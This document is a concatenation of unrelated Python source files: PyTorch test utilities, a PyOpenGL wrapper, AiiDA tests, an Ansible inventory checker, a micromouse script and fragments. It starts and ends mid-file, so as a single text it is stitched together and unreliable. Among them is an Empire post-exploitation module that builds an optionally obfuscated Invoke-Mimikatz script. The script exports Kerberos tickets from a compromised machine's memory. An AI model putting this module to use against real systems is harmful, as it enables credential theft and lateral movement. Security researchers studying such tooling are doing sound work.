rtol = None if prec is None else 0
self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used to simulate the deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def maybeWarnsRegex(self, category, regex=''):
"""Context manager for code that *may* warn, e.g. ``TORCH_WARN_ONCE``.
This filters expected warnings from the test log and fails the test if
any unexpected warnings are caught.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
# Ignore expected warnings
warnings.filterwarnings("ignore", message=regex, category=category)
try:
yield
finally:
if len(ws) != 0:
msg = 'Caught unexpected warnings:\n'
for w in ws:
msg += warnings.formatwarning(
w.message, w.category, w.filename, w.lineno, w.line)
msg += '\n'
self.fail(msg)
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
f.write(s)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "XXX"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
import subprocess
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
pipes = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
return pipes.communicate()[1].decode('ascii')
if sys.version_info < (3, 2):
# assertRegexpMatches renamed to assertRegex in 3.2
assertRegex = unittest.TestCase.assertRegexpMatches
# assertRaisesRegexp renamed to assertRaisesRegex in 3.2
assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
if sys.version_info < (3, 5):
# assertNotRegexpMatches renamed to assertNotRegex in 3.5
assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg)
def find_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
sockname = sock.getsockname()
sock.close()
return sockname[1]
# Errors that we can get in c10d initialization and for which we should retry tests.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
    """Reruns a test if the test raises a RuntimeError and the exception
    message matches exactly one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
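# Hedged usage sketch: both decorator forms are supported, e.g.
#
#     @retry_on_connect_failures
#     def test_default_store(self):
#         ...
#
#     @retry_on_connect_failures(connect_errors=(ADDRESS_IN_USE, CONNECT_TIMEOUT))
#     def test_store_with_timeout(self):
#         ...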
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
result = torch.randn(dim_size, dim_size)
result[0, 1] = 0
return result
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, v = A.svd()
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
u, s, v = A.svd()
s.clamp_(min=min_singular_value)
A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
det = A.det()
if sign is not None:
if A.dim() == 2:
det = det.item()
if (det < 0) ^ (sign < 0):
A[0, :].neg_()
else:
cond = ((det < 0) ^ (sign < 0)).nonzero()
if cond.size(0) > 0:
for i in range(cond.size(0)):
A[list(cond[i])][0, :].neg_()
return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, v = A.svd()
s = torch.arange(1., matrix_size + 1, dtype=dtype, device=device).mul_(1.0 / (matrix_size + 1)).diag()
return u.matmul(s.expand(batch_dims + (matrix_size, matrix_size)).matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, v = A.svd(some=False)
s = torch.zeros(rows, columns, dtype=dtype, device=device)
k = min(rows, columns)
for i in range(k):
s[i, i] = float(i + 1) / (k + 1)
if singular:
# make matrix singular
s[k - 1, k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0, 0] = 0
return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches the given density as the size
of the matrix increases, provided the requested density is relatively
small but still higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
return A.coalesce()
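# Worked example of the density guarantee above (numbers for illustration only):
# with rows = columns = 100 and density = 0.01, nonzero_elements =
# max(100, int(100 * 100 * 0.01)) = 100, so the coalesced COO tensor stores at
# most 100 values, i.e. a density of roughly 0.01 (duplicate indices merged by
# coalesce() can only lower that count).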
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices = [icoords, jcoords]
return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
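# For example (hypothetical call, for illustration): random_sparse_pd_matrix(4,
# density=0.5) yields a 4x4 sparse symmetric positive-definite tensor with
# eigenvalues 0.25, 0.5, 0.75 and 1.0, since the rotations applied above
# preserve the spectrum of the initial diagonal matrix.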
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs))
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
|
'''OpenGL extension EXT.robustness
This module customises the behaviour of the
OpenGL.raw.GLES2.EXT.robustness to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/robustness.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glReadnPixelsEXT.data size not checked against bufSize
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
'data', None
)
# INPUT glGetnUniformfvEXT.params size not checked against bufSize
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
'params', None
)
# INPUT glGetnUniformivEXT.params size not checked against bufSize
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
'params', None
)
### END AUTOGENERATED SECTION
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name
"""Tests for :class:`aiida.orm.nodes.data.base.BaseType` classes."""
import operator
import pytest
from aiida.orm import Bool, Float, Int, NumericType, Str, load_node
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'node_type, default, value', [
(Bool, False, True),
(Int, 0, 5),
(Float, 0.0, 5.5),
(Str, '', 'a'),
]
)
def test_create(node_type, default, value):
"""Test the creation of the ``BaseType`` nodes."""
node = node_type()
assert node.value == default
node = node_type(value)
assert node.value == value
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type', [Bool, Float, Int, Str])
def test_store_load(node_type):
"""Test ``BaseType`` node storing and loading."""
node = node_type()
node.store()
loaded = load_node(node.pk)
assert node.value == loaded.value
@pytest.mark.usefixtures('clear_database_before_test')
def test_modulo():
"""Test ``Int`` modulus operation."""
term_a = Int(12)
term_b = Int(10)
assert term_a % term_b == 2
assert isinstance(term_a % term_b, NumericType)
assert term_a % 10 == 2
assert isinstance(term_a % 10, NumericType)
assert 12 % term_b == 2
assert isinstance(12 % term_b, NumericType)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_add(node_type, a, b):
"""Test addition for ``Int`` and ``Float`` nodes."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Node and native (both ways)
result = node_a + b
assert isinstance(result, node_type)
assert result.value == a + b
result = a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Inplace
result = node_type(a)
result += node_b
assert isinstance(result, node_type)
assert result.value == a + b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_multiplication(node_type, a, b):
"""Test floats multiplication."""
node_a = node_type(a)
node_b = node_type(b)
# Check multiplication
result = node_a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Check multiplication Node and native (both ways)
result = node_a * b
assert isinstance(result, node_type)
assert result.value == a * b
result = a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Inplace
result = node_type(a)
result *= node_b
assert isinstance(result, node_type)
assert result.value == a * b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_division(node_type, a, b):
"""Test the ``BaseType`` normal division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a / node_b
assert result == a / b
assert isinstance(result, Float) # Should be a `Float` for both node types
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_division_integer(node_type, a, b):
"""Test the ``Int`` integer division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a // node_b
assert result == a // b
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, base, power', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_power(node_type, base, power):
"""Test power operator."""
node_base = node_type(base)
node_power = node_type(power)
result = node_base**node_power
assert result == base**power
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_modulus(node_type, a, b):
"""Test modulus operator."""
node_a = node_type(a)
node_b = node_type(b)
assert node_a % node_b == a % b
assert isinstance(node_a % node_b, node_type)
assert node_a % b == a % b
assert isinstance(node_a % b, node_type)
assert a % node_b == a % b
assert isinstance(a % node_b, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'opera', [
operator.add, operator.mul, operator.pow, operator.lt, operator.le, operator.gt, operator.ge, operator.iadd,
operator.imul
]
)
def test_operator(opera):
"""Test operations between Int and Float objects."""
node_a = Float(2.2)
node_b = Int(3)
for node_x, node_y in [(node_a, node_b), (node_b, node_a)]:
res = opera(node_x, node_y)
c_val = opera(node_x.value, node_y.value)
assert res._type == type(c_val) # pylint: disable=protected-access
assert res == opera(node_x.value, node_y.value)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Bool, False, True),
(Int, 2, 5),
(Float, 2.5, 5.5),
(Str, 'a', 'b'),
])
def test_equality(node_type, a, b):
"""Test equality comparison for the base types."""
node_a = node_type(a)
node_a_clone = node_type(a)
node_b = node_type(b)
# Test equality comparison with Python base types
assert node_a == a
assert node_a != b
# Test equality comparison with other `BaseType` nodes
assert node_a == node_a_clone
assert node_a != node_b
|
#!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
contrib_hosts = sorted(contrib['_meta']['hostvars'].keys())
plugin_hosts = sorted(plugin['_meta']['hostvars'].keys())
assert contrib_hosts == plugin_hosts
return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
contrib_groups = set(contrib.keys())
plugin_groups = set(plugin.keys())
missing_groups = contrib_groups.difference(plugin_groups)
if missing_groups:
print("groups: %s are missing from the plugin" % missing_groups)
assert not missing_groups
return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
# tags are a dict in the plugin
if key.startswith('ec2_tag'):
print('assert tag', key, value)
assert 'tags' in plugin['_meta']['hostvars'][host], 'b file does not have tags in host'
btags = plugin['_meta']['hostvars'][host]['tags']
tagkey = key.replace('ec2_tag_', '')
assert tagkey in btags, '%s tag not in b file host tags' % tagkey
assert value == btags[tagkey], '%s != %s' % (value, btags[tagkey])
else:
print('assert var', key, value, key in plugin['_meta']['hostvars'][host], plugin['_meta']['hostvars'][host].get(key))
assert key in plugin['_meta']['hostvars'][host], "%s not in b's %s hostvars" % (key, host)
assert value == plugin['_meta']['hostvars'][host][key], "%s != %s" % (value, plugin['_meta']['hostvars'][host][key])
def main():
# a should be the source of truth (the script output)
a = sys.argv[1]
# b should be the thing to check (the plugin output)
b = sys.argv[2]
with open(a, 'r') as f:
adata = json.loads(f.read())
with open(b, 'r') as f:
bdata = json.loads(f.read())
print(adata)
print(bdata)
# all hosts should be present obviously
ahosts, bhosts = check_hosts(adata, bdata)
# all groups should be present obviously
agroups, bgroups = check_groups(adata, bdata)
# check host vars can be reconstructed
for ahost in ahosts:
contrib_host_vars = adata['_meta']['hostvars'][ahost]
for key, value in contrib_host_vars.items():
check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
main()
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz extract kerberos tickets.',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract kerberos tickets from memory in base64-encoded form."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
# this might not be necessary. Could probably be achieved by just calling mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file -Hubbl3
def get_db_connection(self):
"""
Returns the connection for the SQLite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
|
CODEOWNERS = ["@esphome/core"]
|
from micromouse import mouse, maze
def begin():
"""
:return: None. This function begins micromouse operation.
"""
some_maze = maze.Maze(16)
some_mouse = mouse.Mouse(0, 0, some_maze)
print "Mouse initialized at (%d, %d)" % (some_mouse.x, some_mouse.y)
while some_mouse.maze.map[some_mouse.x][some_mouse.y].get_weight() != 0:
path = some_mouse.find_path()
some_mouse.take_path(path)
print "Mouse moved to (%d, %d)" % (some_mouse.x, some_mouse.y)
print "Mouse solved the maze."
if __name__ == '__main__':
begin()
|
"""
Copyright (c) 2017 Cyberhaven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
